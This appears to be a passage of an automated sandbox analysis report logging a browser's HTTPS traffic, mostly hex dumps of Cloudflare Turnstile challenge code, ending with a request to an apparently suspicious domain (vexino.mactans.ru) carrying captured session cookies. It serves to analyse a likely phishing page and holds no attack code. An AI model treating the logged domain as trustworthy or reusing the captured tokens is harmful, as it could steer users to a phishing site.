                                                                                                                                                                                                                          Data Ascii: ;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1
                                                                                                                                                                                                                          2024-12-17 17:21:03 UTC1369INData Raw: 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d
                                                                                                                                                                                                                          Data Ascii: ay:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-com
                                                                                                                                                                                                                          2024-12-17 17:21:03 UTC1369INData Raw: 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65
                                                                                                                                                                                                                          Data Ascii: i{left:255px}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:fle
                                                                                                                                                                                                                          2024-12-17 17:21:03 UTC1369INData Raw: 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                                                                                                                                                                                          Data Ascii: olor:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          14192.168.2.1849797104.18.95.41443676C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-12-17 17:21:05 UTC727OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f38965da8164322&lang=auto HTTP/1.1
                                                                                                                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/icqy5/0x4AAAAAAA2OnbUL2-DXkbe_/auto/fbE/normal/auto/
                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                          2024-12-17 17:21:05 UTC331INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Tue, 17 Dec 2024 17:21:05 GMT
                                                                                                                                                                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                          Content-Length: 112103
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          CF-RAY: 8f3896683f0d0c7c-EWR
                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                          2024-12-17 17:21:05 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 53 79 57 4f 55 33 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74
                                                                                                                                                                                                                          Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.SyWOU3={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.privacy_link":"htt
                                                                                                                                                                                                                          2024-12-17 17:21:05 UTC1369INData Raw: 30 43 68 65 63 6b 25 32 30 79 6f 75 72 25 32 30 49 6e 74 65 72 6e 65 74 25 32 30 63 6f 6e 6e 65 63 74 69 6f 6e 25 32 30 61 6e 64 25 32 30 25 33 43 61 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 72 65 66 72 65 73 68 5f 6c 69 6e 6b 25 32 32 25 33 45 72 65 66 72 65 73 68 25 32 30 74 68 65 25 32 30 70 61 67 65 25 33 43 25 32 46 61 25 33 45 25 32 30 69 66 25 32 30 74 68 65 25 32 30 69 73 73 75 65 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 74 65 73 74 69 6e 67 5f 6f 6e 6c 79 22 3a 22 54 65 73 74 69 6e 67 25 32 30 6f 6e 6c 79 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 6f 76 65 72 72 75 6e 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 53 74 75 63 6b 25 32 30 68 65 72 65 25 33 46 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 61 69 6c 75 72 65 22 3a 22 45 72 72 6f 72 22
                                                                                                                                                                                                                          Data Ascii: 0Check%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E%20if%20the%20issue%20persists.","testing_only":"Testing%20only.","turnstile_overrun_description":"Stuck%20here%3F","turnstile_failure":"Error"
                                                                                                                                                                                                                          2024-12-17 17:21:05 UTC1369INData Raw: 2c 66 4e 2c 66 4f 2c 66 59 2c 67 39 2c 67 64 2c 67 67 2c 67 68 2c 67 48 2c 67 65 2c 67 66 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 67 49 28 37 34 31 29 29 2f 31 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 31 34 37 39 29 29 2f 32 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 35 31 35 29 29 2f 33 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 33 30 38 29 29 2f 34 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 34 36 36 29 29 2f 35 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 34 39 29 29 2f 36 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 31 30 36 39 29 29 2f 37 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31
                                                                                                                                                                                                                          Data Ascii: ,fN,fO,fY,g9,gd,gg,gh,gH,ge,gf){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(741))/1*(parseInt(gI(1479))/2)+parseInt(gI(515))/3+-parseInt(gI(308))/4*(parseInt(gI(466))/5)+parseInt(gI(149))/6*(parseInt(gI(1069))/7)+parseInt(gI(1
                                                                                                                                                                                                                          2024-12-17 17:21:05 UTC1369INData Raw: 2c 48 3d 30 3b 48 3c 47 5b 68 75 28 39 38 31 29 5d 3b 47 5b 48 5d 3d 3d 3d 47 5b 6f 5b 68 75 28 31 31 37 34 29 5d 28 48 2c 31 29 5d 3f 47 5b 68 75 28 36 37 30 29 5d 28 48 2b 31 2c 31 29 3a 48 2b 3d 31 29 3b 72 65 74 75 72 6e 20 47 7d 28 78 29 2c 42 3d 27 6e 41 73 41 61 41 62 27 2e 73 70 6c 69 74 28 27 41 27 29 2c 42 3d 42 5b 68 74 28 37 31 30 29 5d 5b 68 74 28 31 33 37 29 5d 28 42 29 2c 43 3d 30 3b 43 3c 78 5b 68 74 28 39 38 31 29 5d 3b 44 3d 78 5b 43 5d 2c 45 3d 6f 5b 68 74 28 37 37 38 29 5d 28 66 34 2c 67 2c 68 2c 44 29 2c 6f 5b 68 74 28 38 36 39 29 5d 28 42 2c 45 29 3f 28 46 3d 6f 5b 68 74 28 32 31 31 29 5d 28 27 73 27 2c 45 29 26 26 21 67 5b 68 74 28 37 34 30 29 5d 28 68 5b 44 5d 29 2c 6f 5b 68 74 28 32 31 31 29 5d 28 68 74 28 31 33 33 39 29 2c 69 2b
                                                                                                                                                                                                                          Data Ascii: ,H=0;H<G[hu(981)];G[H]===G[o[hu(1174)](H,1)]?G[hu(670)](H+1,1):H+=1);return G}(x),B='nAsAaAb'.split('A'),B=B[ht(710)][ht(137)](B),C=0;C<x[ht(981)];D=x[C],E=o[ht(778)](f4,g,h,D),o[ht(869)](B,E)?(F=o[ht(211)]('s',E)&&!g[ht(740)](h[D]),o[ht(211)](ht(1339),i+
                                                                                                                                                                                                                          2024-12-17 17:21:05 UTC1369INData Raw: 67 4a 2c 64 3d 7b 7d 2c 64 5b 68 79 28 32 33 38 29 5d 3d 68 79 28 36 37 31 29 2c 65 3d 64 2c 66 3d 31 2c 67 3d 31 65 33 2a 65 4d 5b 68 79 28 31 32 31 32 29 5d 5b 68 79 28 31 31 38 33 29 5d 28 32 3c 3c 66 2c 33 32 29 2c 65 4d 5b 68 79 28 34 37 36 29 5d 28 66 75 6e 63 74 69 6f 6e 28 68 7a 29 7b 68 7a 3d 68 79 2c 65 4d 5b 68 7a 28 31 34 34 32 29 5d 26 26 28 65 4d 5b 68 7a 28 31 30 32 35 29 5d 5b 68 7a 28 38 36 37 29 5d 28 29 2c 65 4d 5b 68 7a 28 31 30 32 35 29 5d 5b 68 7a 28 31 31 37 33 29 5d 28 29 2c 65 4d 5b 68 7a 28 33 32 31 29 5d 3d 21 21 5b 5d 2c 65 4d 5b 68 7a 28 31 34 34 32 29 5d 5b 68 7a 28 34 32 34 29 5d 28 7b 27 73 6f 75 72 63 65 27 3a 68 7a 28 38 39 35 29 2c 27 77 69 64 67 65 74 49 64 27 3a 65 4d 5b 68 7a 28 31 30 39 39 29 5d 5b 68 7a 28 31 30 39
                                                                                                                                                                                                                          Data Ascii: gJ,d={},d[hy(238)]=hy(671),e=d,f=1,g=1e3*eM[hy(1212)][hy(1183)](2<<f,32),eM[hy(476)](function(hz){hz=hy,eM[hz(1442)]&&(eM[hz(1025)][hz(867)](),eM[hz(1025)][hz(1173)](),eM[hz(321)]=!![],eM[hz(1442)][hz(424)]({'source':hz(895),'widgetId':eM[hz(1099)][hz(109
                                                                                                                                                                                                                          2024-12-17 17:21:05 UTC1369INData Raw: 28 31 35 39 29 5d 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 39 27 3a 78 5b 68 41 28 31 34 36 33 29 5d 3d 35 65 33 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 30 27 3a 78 5b 68 41 28 35 39 38 29 5d 28 73 2c 6f 2c 21 21 5b 5d 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 31 27 3a 78 5b 68 41 28 32 37 37 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 32 27 3a 47 3d 28 46 3d 7b 7d 2c 46 5b 68 41 28 36 37 32 29 5d 3d 65 4d 5b 68 41 28 31 30 39 39 29 5d 5b 68 41 28 36 37 32 29 5d 2c 46 5b 68 41 28 37 38 33 29 5d 3d 65 4d 5b 68 41 28 31 30 39 39 29 5d 5b 68 41 28 37 38 33 29 5d 2c 46 5b 68 41 28 31 34 35 33 29 5d 3d 65 4d 5b 68 41 28 31 30 39 39 29 5d 5b 68 41 28 31 34 35 33 29 5d 2c 46 5b 68 41 28 35
                                                                                                                                                                                                                          Data Ascii: (159)]);continue;case'9':x[hA(1463)]=5e3;continue;case'10':x[hA(598)](s,o,!![]);continue;case'11':x[hA(277)]=function(){};continue;case'12':G=(F={},F[hA(672)]=eM[hA(1099)][hA(672)],F[hA(783)]=eM[hA(1099)][hA(783)],F[hA(1453)]=eM[hA(1099)][hA(1453)],F[hA(5
                                                                                                                                                                                                                          2024-12-17 17:21:05 UTC1369INData Raw: 6b 5b 68 44 28 31 39 39 29 5d 28 74 68 69 73 2e 68 5b 31 35 30 2e 34 34 5e 74 68 69 73 2e 67 5d 5b 31 5d 5b 68 44 28 39 39 39 29 5d 28 74 68 69 73 2e 68 5b 31 35 30 5e 74 68 69 73 2e 67 5d 5b 30 5d 2b 2b 29 2c 39 38 29 2b 32 35 36 2c 32 35 35 29 5e 32 33 31 2e 37 32 5e 74 68 69 73 2e 67 5d 3d 7b 7d 3a 28 6e 3d 7b 7d 2c 6e 5b 68 44 28 31 33 34 30 29 5d 3d 65 2c 6e 5b 68 44 28 31 35 39 29 5d 3d 66 2c 6e 5b 68 44 28 31 31 35 29 5d 3d 67 2c 6e 5b 68 44 28 31 31 35 31 29 5d 3d 68 2c 6e 5b 68 44 28 34 37 30 29 5d 3d 69 2c 6f 3d 6e 2c 65 4d 5b 68 44 28 34 37 36 29 5d 28 66 75 6e 63 74 69 6f 6e 28 68 46 29 7b 68 46 3d 68 44 2c 65 4d 5b 68 46 28 31 30 35 36 29 5d 28 6f 2c 75 6e 64 65 66 69 6e 65 64 2c 68 46 28 31 32 31 38 29 29 7d 2c 31 30 29 2c 65 4d 5b 68 44 28
                                                                                                                                                                                                                          Data Ascii: k[hD(199)](this.h[150.44^this.g][1][hD(999)](this.h[150^this.g][0]++),98)+256,255)^231.72^this.g]={}:(n={},n[hD(1340)]=e,n[hD(159)]=f,n[hD(115)]=g,n[hD(1151)]=h,n[hD(470)]=i,o=n,eM[hD(476)](function(hF){hF=hD,eM[hF(1056)](o,undefined,hF(1218))},10),eM[hD(
                                                                                                                                                                                                                          2024-12-17 17:21:05 UTC1369INData Raw: 74 69 6f 6e 28 66 29 7b 72 65 74 75 72 6e 20 66 28 29 7d 2c 27 69 66 77 55 56 27 3a 66 75 6e 63 74 69 6f 6e 28 66 2c 67 29 7b 72 65 74 75 72 6e 20 66 3e 67 7d 2c 27 42 58 53 4f 4e 27 3a 66 75 6e 63 74 69 6f 6e 28 66 2c 67 29 7b 72 65 74 75 72 6e 20 66 2d 67 7d 7d 2c 64 3d 65 4d 5b 69 59 28 31 30 39 39 29 5d 5b 69 59 28 31 34 32 38 29 5d 7c 7c 31 65 34 2c 65 3d 67 61 28 29 2c 21 65 4d 5b 69 59 28 33 32 31 29 5d 26 26 21 63 5b 69 59 28 33 34 36 29 5d 28 66 50 29 26 26 21 65 4d 5b 69 59 28 31 30 32 35 29 5d 5b 69 59 28 31 30 37 35 29 5d 26 26 63 5b 69 59 28 31 34 32 35 29 5d 28 63 5b 69 59 28 35 38 31 29 5d 28 65 2c 67 39 29 2c 64 29 3f 66 76 28 29 3a 66 77 28 29 7d 2c 31 65 33 29 29 2c 67 64 3d 7b 7d 2c 67 64 5b 67 4a 28 31 30 37 35 29 5d 3d 21 5b 5d 2c 67
                                                                                                                                                                                                                          Data Ascii: tion(f){return f()},'ifwUV':function(f,g){return f>g},'BXSON':function(f,g){return f-g}},d=eM[iY(1099)][iY(1428)]||1e4,e=ga(),!eM[iY(321)]&&!c[iY(346)](fP)&&!eM[iY(1025)][iY(1075)]&&c[iY(1425)](c[iY(581)](e,g9),d)?fv():fw()},1e3)),gd={},gd[gJ(1075)]=![],g
                                                                                                                                                                                                                          2024-12-17 17:21:05 UTC1369INData Raw: 61 55 67 6e 4c 27 3a 6a 77 28 38 36 36 29 2c 27 41 46 45 61 56 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 66 45 57 53 49 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 51 43 52 69 58 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 3d 69 7d 2c 27 4d 65 79 65 75 27 3a 6a 77 28 36 33 30 29 2c 27 61 4f 77 6b 73 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 63 65 4b 68 51 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 7c 69 7d 2c 27 78 46 52 41 77 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 26 68 7d 2c 27 4d 79 71 53 52 27 3a 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                                                          Data Ascii: aUgnL':jw(866),'AFEaV':function(h,i){return h>i},'fEWSI':function(h,i){return h==i},'QCRiX':function(h,i){return h===i},'Meyeu':jw(630),'aOwks':function(h,i){return h<i},'ceKhQ':function(h,i){return h|i},'xFRAw':function(h,i){return i&h},'MyqSR':function(
                                                                                                                                                                                                                          2024-12-17 17:21:05 UTC1369INData Raw: 4f 2c 50 2c 6a 7a 29 7b 72 65 74 75 72 6e 20 6a 7a 3d 62 2c 64 5b 6a 7a 28 37 30 34 29 5d 28 4f 2c 50 29 7d 2c 27 47 6b 51 58 68 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 50 29 7b 72 65 74 75 72 6e 20 4f 3d 3d 50 7d 2c 27 42 69 6c 5a 6e 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 50 29 7b 72 65 74 75 72 6e 20 4f 3c 50 7d 2c 27 6b 57 57 4d 44 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 50 2c 6a 41 29 7b 72 65 74 75 72 6e 20 6a 41 3d 62 2c 64 5b 6a 41 28 33 31 39 29 5d 28 4f 2c 50 29 7d 7d 2c 6e 75 6c 6c 3d 3d 69 29 72 65 74 75 72 6e 27 27 3b 66 6f 72 28 42 3d 7b 7d 2c 43 3d 7b 7d 2c 44 3d 27 27 2c 45 3d 32 2c 46 3d 33 2c 47 3d 32 2c 48 3d 5b 5d 2c 49 3d 30 2c 4a 3d 30 2c 4b 3d 30 3b 4b 3c 69 5b 6a 42 28 39 38 31 29 5d 3b 4b 2b 3d 31 29 69 66 28 4c 3d 69 5b 6a 42 28 31
                                                                                                                                                                                                                          Data Ascii: O,P,jz){return jz=b,d[jz(704)](O,P)},'GkQXh':function(O,P){return O==P},'BilZn':function(O,P){return O<P},'kWWMD':function(O,P,jA){return jA=b,d[jA(319)](O,P)}},null==i)return'';for(B={},C={},D='',E=2,F=3,G=2,H=[],I=0,J=0,K=0;K<i[jB(981)];K+=1)if(L=i[jB(1


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          15192.168.2.1849798104.18.95.41443676C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-12-17 17:21:05 UTC739OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                                                                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/icqy5/0x4AAAAAAA2OnbUL2-DXkbe_/auto/fbE/normal/auto/
                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                          2024-12-17 17:21:05 UTC240INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Tue, 17 Dec 2024 17:21:05 GMT
                                                                                                                                                                                                                          Content-Type: image/png
                                                                                                                                                                                                                          Content-Length: 61
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          cache-control: max-age=2629800, public
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          CF-RAY: 8f389669797e8c89-EWR
                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                          2024-12-17 17:21:05 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                          Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          16192.168.2.1849778172.67.208.33443676C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-12-17 17:21:06 UTC1321OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                                          Host: vexino.mactans.ru
                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                          Referer: https://vexino.mactans.ru/21EzuOJ/
                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                          Cookie: XSRF-TOKEN=eyJpdiI6ImFlK2l1UXhEd2dqWStTdGs4Z1IxclE9PSIsInZhbHVlIjoiSFZOamFVbTRMZVV6bTBSUG00Qi9lV1FWZkFGN00yc3ExaHRxd2xvbWJiU3NUWDh6aXl0Skc5WURnK2owWnYwcmkyaWJnZmd3VkdEN0pmdktKbms1UEJrSWVoR2orVWgyYTVFM0RaT2VXd3FtNU5GZ1BodVZSNFd0d2NjM01QTk8iLCJtYWMiOiI5N2U5YmQ4NWFjZDA1NTdmMzM3ZjFhYmFmNGQ4MzkxNDZiZDhjZmQwNDE1YmRmNTRjZDFjNmMyMTIzM2U3OTE0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjlOYm0yeHV3L0l4UFA1Q2dWUUxnU1E9PSIsInZhbHVlIjoibkpYSmVIQmY2SVVhcXpuMU5QemZEOGp2YUVZWHlBM0daZ0tvRUh4cDRlQitsMjhEYWYwaW1USnc1cUZWTDRwU3Ywc3VoaEJvSlZtTGpla1VpWm1xZGpZV0tobXB6WEI0QlhzY3JMOEhoZ0E0MUJiZHFWRlFqcS85UnhodXF1UDciLCJtYWMiOiI0MzdhYTk2YjQyZWZkZjAwOTU1Y2Y1NTk0ZThjMjk1YjMwZTBiNDM3NjA3YzYxMzg2OTM3Njg2OTM3YjUzYmVlIiwidGFnIjoiIn0%3D
                                                                                                                                                                                                                          2024-12-17 17:21:06 UTC1068INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                          Date: Tue, 17 Dec 2024 17:21:06 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Cache-Control: max-age=14400
                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tziHdpkoCEKt0CsF%2Fbc7FyWGB3Dhu%2BGtFT66JCs6RQiZuUOtkxC7NMgrnXIBYw2XsD9sCGpos0sfwtv67XKF3LwU6C6rXPjxOcH8EfcGVdNIQlJ4X%2Bvnmvc913WAuQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
